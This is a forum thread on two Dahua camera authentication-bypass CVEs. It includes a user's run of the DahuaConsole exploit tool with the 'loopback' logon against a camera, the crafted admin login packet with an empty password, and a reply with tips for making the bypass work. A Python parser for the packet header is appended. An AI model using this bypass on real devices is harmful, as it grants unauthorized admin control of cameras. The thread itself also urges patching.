Dahua CVE-2021-33044; CVE-2021-33045

It seems to be the season for severe vulnerabilities being disclosed.
The Annke one was also pretty bad -
 

Cool stuff, both of these CVEs will not give you RCE, but will give you Admin access to the device if not using fixed FW, so you should upgrade soonest. If no new FW can be found for your device on the Dahua website (like many of my own), you should definitely contact Dahua support and file an official complaint.
 
Ughhh
 
Hi. I tried DahuaConsole on some Alibi Security clones of Dahua cameras but was unsuccessful. The only ports that nmap reports are: 80, 81, 85, 554, 5060, and 49152.
Code:
/DahuaConsole# ./Console.py --logon loopback --rhost 172.16.0.10  --rport 80 -d
[*] [Dahua Debug Console 2019-2021 bashis <mcw noemail eu>]
[*] logon type "loopback" with proto "dhip" at 172.16.0.10:80
[+] Opening connection to 172.16.0.10 on port 80: Done
[-] Dahua Debug Console: Failed
[-] Login: global.login [random]
[BEGIN SEND (172.16.0.10)] <------------------1801------------------>
20000000|44484950|00000000|00000000|91000000|00000000|91000000|00000000
{"method": "global.login", "params": {"userName": "admin", "password": "", "clientType": "Web3.0", "loginType": "Direct"}, "id": 0, "session": 0}
[ END  SEND (172.16.0.10)] <------------------1801------------------>
[*] Closed connection to 172.16.0.10 port 80
[-] [p2p] EOFError()
[*] All done

Of the examples on GitHub, this was the only one that could connect to the camera. Does the p2p EOF error mean that the exploit won't work on my camera?

Thanks
 

I noted you are missing the TCP/37777 port; are you sure it is a Dahua clone?
You don't receive anything back from the device, hence "[-] [p2p] EOFError()".

Can you log in with the script at all on the device w/ valid credentials?
  • You could try some of these '--proto {dhip,dvrip,3des,http,https}'.
  • If it's old FW - older than 2017ish, you could try to add "magic":"0x1234" to all outgoing JSON in net.py : p2p() at 'packet.update({})'
 
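Added example, not part of the thread or of DahuaConsole: a small Python parser that decodes the header line from the debug dump quoted above and checks its length fields against the JSON body, plus a triage helper for the bytes read back from the device side of a capture. The field names `word0`, `session` and `request_id` are assumptions inferred from the dump; only the `DHIP` tag and the length (0x91 = 145 bytes) are checked against what the page shows.

```python
import json
import struct

# Constructed from the debug output quoted in the thread: the header line as
# printed (eight 32-bit words in hex, "|"-separated) and the JSON body.
HEADER_DUMP = "20000000|44484950|00000000|00000000|91000000|00000000|91000000|00000000"
BODY = ('{"method": "global.login", "params": {"userName": "admin", "password": "", '
        '"clientType": "Web3.0", "loginType": "Direct"}, "id": 0, "session": 0}')
HEADER_LEN = 32


def parse_frame(header_dump: str, body: str) -> dict:
    """Decode a dumped 32-byte header and cross-check it against the JSON body."""
    raw = bytes.fromhex(header_dump.replace("|", ""))
    if len(raw) != HEADER_LEN:
        raise ValueError(f"expected {HEADER_LEN} header bytes, got {len(raw)}")
    if raw[4:8] != b"DHIP":
        raise ValueError(f"unexpected protocol tag {raw[4:8]!r}")
    # Field names are assumptions; all words are little-endian 32-bit values.
    word0, _tag, session, req_id, len_a, _r1, len_b, _r2 = struct.unpack("<I4sIIIIII", raw)
    msg = json.loads(body)
    return {
        "word0": word0,
        "session": session,
        "request_id": req_id,
        "declared_len": len_a,
        "len_fields_agree": len_a == len_b,
        "len_matches_body": len_a == len(body.encode("utf-8")),
        "ids_match_json": (session, req_id) == (msg.get("session"), msg.get("id")),
        "method": msg.get("method"),
    }


def classify_reply(data: bytes) -> str:
    """Triage the bytes received from the device after a request was sent."""
    if not data:
        return "empty"      # peer closed without answering: the EOFError case
    if len(data) < HEADER_LEN or data[4:8] != b"DHIP":
        return "not-dhip"   # something answered, but not with this framing
    declared = struct.unpack_from("<I", data, 16)[0]
    return "complete" if len(data) - HEADER_LEN >= declared else "truncated"


if __name__ == "__main__":
    print(parse_frame(HEADER_DUMP, BODY))
    print(classify_reply(b""))
```
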